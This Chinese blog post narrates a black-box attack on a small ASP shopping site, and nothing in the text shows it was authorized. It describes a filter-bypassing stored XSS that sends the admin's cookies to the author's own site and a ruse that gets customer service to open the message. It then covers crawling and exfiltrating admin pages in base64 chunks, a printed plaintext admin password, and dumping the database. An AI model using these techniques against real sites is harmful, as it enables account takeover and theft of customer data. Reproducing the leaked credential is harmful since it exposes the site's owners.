黑客渗透笔记 XSS跨站黑盒入侵实战

作者: 黑客_花无涯 | 来源:发表于2017-10-24 20:53 被阅读46次

    黑客渗透笔记 XSS跨站黑盒入侵实战

    黑客花无涯 带你走进黑客世界系列文章

    学习黑客经典书籍 网络黑白 某宝有售

    现在注入越来越少了,于是XSS入侵开始成为热门的手法了,记录一个XSS手法CRSF入侵的实例,朋友接了一个购物商城的单子,让我帮忙一起看看,独立服务器,用的老旧的ASP语言的程序,不是主流的CMS系统或者购物系统,我想应该是自己开发的吧。

    在一般的xss检测过程中,安全研究人员或者是黑客,通常会使用最简单的alert(1),来检测当前输入位置是否存在xss。

    ps:什么是alert(1)?这是一行简单的javascript代码,如果正常运行的话,浏览器将会弹出一个对话框。如果你使用的是Chrome浏览器的话,可以尝试着按F12开启开发者选项,在console中输入alert(1)。将会看到如下效果

    ASP的漏洞就那么几个,没有啥注入点,所有id都是经过cint处理过的,网站找不到后台。服务器的C段也没有几个网站。想渗透也不好下手。悲剧的,我转了一圈又一圈,也没啥突破口。怪不得叫我看看。重新回到网站。随手注册了个账户,发现可以给管理员留言。看来只有XSS这一条路了。这个留言可以自己查看,修改,删除。这样测试XSS就不怕管理员发现了。

    开始测试xss。发现script替换成了空反复测试了下发现huawuya/sscriptcript/sscriptcript替换成为script/script是支持的。于是写了js丢自己空间里面。1.js的内容如下,网址我用我的BLOG替代了:

    img=newImage();

    img.src=网址

    给管理员发表留言。

    “我下不了订单sscriptcriptsrc=网址heikexiehui/sscriptcript”

    等了半天没有cookie上钩,于是我直接找到客服系统跟她说:“我下不了单你去看看,我给你留言了。”然后关闭客服系统。这下没两分钟,cookie来了!

    顺利得到后台的地址为Xxaaddmmiinn21012,这谁知道哦。管他了。先进后台再说。

    悲剧的是就是进不去。此路不通,得换个思路,既然可以XSS,那要不然,CRSF加入一个管理员进去。可这程序有不开源,想CRSF也得知道后台的结构啊。那先得想办法获得他网站后台的所有链接。于是修改脚本为:

    经过漫长的XSS,这样,获取了不少的链接。发现有一个可疑连接为adminlist.asp,通过英文名字,就知道,这个管理员列表的意思,修改XSS代码来获取adminlist.asp的页面源代码。

    结果页面太大,不行!get提交数据太多了。

    思考了好久。开始想获取一部分,然后在做判断获取另一部分,把他源代码分段get过来,这里就遇到一个问题。如何分段处理,想了好久。决定把代码加密为base64然后分段传输过来,然后在组装成一个源代码透露部分核心代码。代码写的仓储没做算法思考。

    这样的base64数据。Id不是序列的主要是因为异步传输有些快有些慢。不过总算是获取回来了。

    base64解密整理了下。看来老天眷顾,发现帐号密码。tmd还好不是md5加密的。

    Adminshopsexad123adf456gh!@#$

    接下来,后台登陆成功,脱数据库了。

    学习黑客经典书籍 网络黑白 某宝有售

    中国黑客协会 普及网络安全知识,让更多的人学习并重视网络安全和信息安全。

    中国黑客协会是一种精神的传承,黑客代表是一种精神,它是一种热爱祖国、坚持正义、开拓进取的精神。

    相关文章

      网友评论

        本文标题:黑客渗透笔记 XSS跨站黑盒入侵实战

        本文链接:https://www.haomeiwen.com/subject/ienxpxtx.html